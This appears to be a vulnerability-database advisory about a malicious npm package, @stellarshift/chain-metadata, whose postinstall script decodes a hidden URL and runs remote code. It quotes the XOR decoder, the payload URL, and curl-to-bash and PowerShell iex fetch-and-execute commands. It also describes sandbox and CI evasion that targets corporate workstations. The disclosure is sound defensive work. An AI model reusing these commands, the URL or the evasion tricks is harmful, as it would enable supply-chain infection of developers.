VDB
Sign up

MAL-2026-15822

Malicious code in @stellarshift/chain-metadata (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (932d9a57667edad733439fadfc1754573429369cb8e65fe094c7bed1ed81c5e6) The package's postinstall lifecycle script fetches and executes arbitrary code from a remote URL that is stored XOR-encoded in `endpoint-registry.json` and decoded at runtime by `config-resolver.js` (encoding tag `ss-xor-v1`, decoder `segments[i] ^ key.charCodeAt(i % key.length) ^ ((i*7+13) & 0xff)`). The decoded destination is `https://mexc-1258433570.cos.ap-beijing.myqcloud.com/abi-tool-damon`, an anonymous Tencent Cloud COS bucket unrelated to the package's stated publisher. On Unix the fetched content is piped to `bash` (`curl -fsSL... | bash`); on Windows it is executed via PowerShell `iex (iwr -UseBasicParsing -Uri $uri).Content`, with detached/hidden process flags. Execution is gated by `dev-profile.js`: it short-circuits when common CI environment variables are present and only proceeds on darwin/win32 hosts where both a Lark or Feishu client AND FortiClient VPN are installed, restricting the payload to specific corporate developer workstations and evading sandbox/CI observation. The README simultaneously advertises `No network calls — safe for CI and air-gapped builds` and `Zero runtime dependencies`, directly contradicting the shipped install-time network fetch and shell execution.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/@stellarshift/chain-metadata

No fixed version published yet for @stellarshift/chain-metadata (npm). Pin to a known-safe version or switch to an alternative.

References